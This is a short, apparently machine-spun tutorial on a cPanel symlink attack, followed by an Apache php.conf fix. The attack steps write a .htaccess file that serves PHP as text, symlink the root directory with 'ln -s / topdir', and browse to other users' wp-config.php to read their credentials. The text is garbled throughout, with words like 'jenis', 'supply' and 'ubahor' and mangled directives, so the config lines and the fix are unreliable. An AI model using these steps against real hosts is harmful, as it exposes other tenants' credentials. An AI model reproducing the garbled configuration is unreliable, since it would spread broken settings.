how hackers attack your cpanel
) he login to cpanel currently being a normal user http ://ip-address/cpanel then jenis login and password to login
2 ) then he open file manager ( show hidden files dotfiles ) after which creates new. htaccess file with following supply :
#. htaccess file supply
choices indexes followsymlinks
directoryindex doesnt-metter. htm
addtype txt. php
addhandler txt. php
#end of. htaccess file
3 ) then he creates symbalic link ( soft link ) with perl scripts or barely uses cron job to make symbalic link of top level directory / typing : ln -s / topdir
4 ) after that, he open browser and typing http ://server-ip/~his-home-dir/topdi... /wp-config. php after which barely looking supply as out to the page, all data present currently being a txt( text ) data. thats all. user has actually been hacked.
-------------------------------------------------------------------------------------------------------
answer :
) open your php. conf along with your favorite ubahor : nano /usr/local/apache/conf/php. conf
2 ) commit : #addtype application/x-httpd-php5. php5. php4. php. php3. php2. phtml
3 ) add these lines :
filesmatch. ph( p2-6 ?|tml )$ # this add up to :. php, . php2, . php3, . php4, . php5, . php6. phtml
sethandler application/x-httpd-php5
/filesmatch
4 ) save your changes and shut php. conf
5 ) restart httpd server typing : /etc/init. d/httpd restart
6 ) done
